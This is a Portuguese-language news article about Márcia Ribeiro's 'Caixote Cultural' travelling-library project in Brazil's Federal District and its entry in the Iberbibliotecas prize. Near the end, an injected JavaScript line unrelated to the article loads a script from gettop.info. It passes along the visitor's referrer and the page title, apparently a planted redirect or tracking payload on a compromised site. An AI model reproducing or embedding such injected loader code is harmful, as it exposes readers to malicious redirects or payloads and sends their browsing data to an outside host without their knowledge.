Projeto Caixote Cultural concorre a prêmio internacional

Quem um dia poderia imaginar que a atitude de uma professora de uma biblioteca pública do DF poderia ultrapassar fronteiras? Isso mesmo! Por meio de um caixote cheio de livros literários e muita disposição para percorrer creches, escolas, asilos e presídios da capital federal, a pedagoga Márcia Ribeiro, que há mais de 20 anos se dedica a projetos pedagógicos desenvolveu o projeto Caixote Cultural, que contempla por meio da leitura itinerante creches, escolas, asilos e presídios da capital federal.

 A professora explica que desde que o programa foi desenvolvido em agosto de 2015, várias instituições públicas já foram contempladas com a biblioteca itinerante.  “O objetivo do projeto é consolidar as bibliotecas públicas como espaços de livre acesso à informação e à leitura, de trabalhar pela inclusão social e de contribuir para a qualificação da educação e do desenvolvimento das pessoas, principalmente as que nunca tiveram acesso à leitura e pessoas em situação de vulnerabilidade social”, ressalta a idealizadora do projeto.

Concurso

A iniciativa faz parte do Programa Ibero-Americano de Bibliotecas Públicas (Iberbibliotecas) que realiza, anualmente, um concurso de ajudas, dirigido às bibliotecas públicas dos países e cidades membros da América Latina. O Iberbibliotecas é liderado pela Secretaria-Geral Ibero-Americana (Segib) e conta com a coordenação do Centro Regional para o Fomento do Livro na América Latina para a melhoria da educação  

Os vencedores serão anunciados em 18 de junho, no Chile, e poderão ganhar até $ 18 mil dólares para desenvolverem os projetos em seus respectivos países.

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário